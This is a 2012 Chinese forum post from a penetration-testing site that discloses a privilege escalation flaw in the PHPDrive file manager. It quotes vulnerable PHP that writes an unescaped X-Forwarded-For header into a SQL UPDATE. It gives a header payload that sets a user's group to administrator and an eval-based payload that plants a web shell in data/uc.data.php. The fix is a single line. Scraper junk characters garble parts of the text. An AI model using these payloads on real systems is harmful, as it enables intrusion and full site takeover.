中国网络渗透测试联盟

标题: PHPDrive权限提升漏洞 [打印本页]

作者: admin    时间: 2012-12-31 09:18
标题: PHPDrive权限提升漏洞
PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等3 C! t  n/ m2 f/ y" g, L3 x8 S& U5 C
8 i3 i$ s: R$ f$ c5 W4 N; l, q8 f
includes/user.lib.php
' v( N! |1 c$ \/ _- Y& l行872 c# F" `5 ~. F* [4 Z
function get_ip() {" k0 d' C6 B) q+ R& E
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.9 u9 |! ]( J$ r5 _
在用户注册与登录 处module/disk/account.lead.php2 e1 h6 @8 \7 l6 k
198行
$ J# m; n8 Z7 Z" q- a" F5 t! @ //更新本次登录IP和时间% `" Z. E% |/ ], m6 @
             $db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生% A' M' B. j! g1 A: p' d
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限  j. a; V+ a* j9 Q. K
实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.
6 J: F, b* |7 I3 W. ^- D后台getshell:
5 i' E8 C; f7 d5 M4 T% e" U# \在UCenter设置处,将UC数据库登录名填写为
; H; q, d) z" p! W; ~% E" q % i/ c; b% i& ^7 ^
root’);eval($_POST[DisKill]);?>/*, }( D$ Z7 ^! t5 R
可以得到一个shell,位置在 data/uc.data.php) j; V. J) U3 `4 W! n5 }5 n

) C# Y! Q6 \! Q9 M) e  k修复:过滤注入
1 ^& Q4 R( |7 a6 m% k% Q  e" F





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2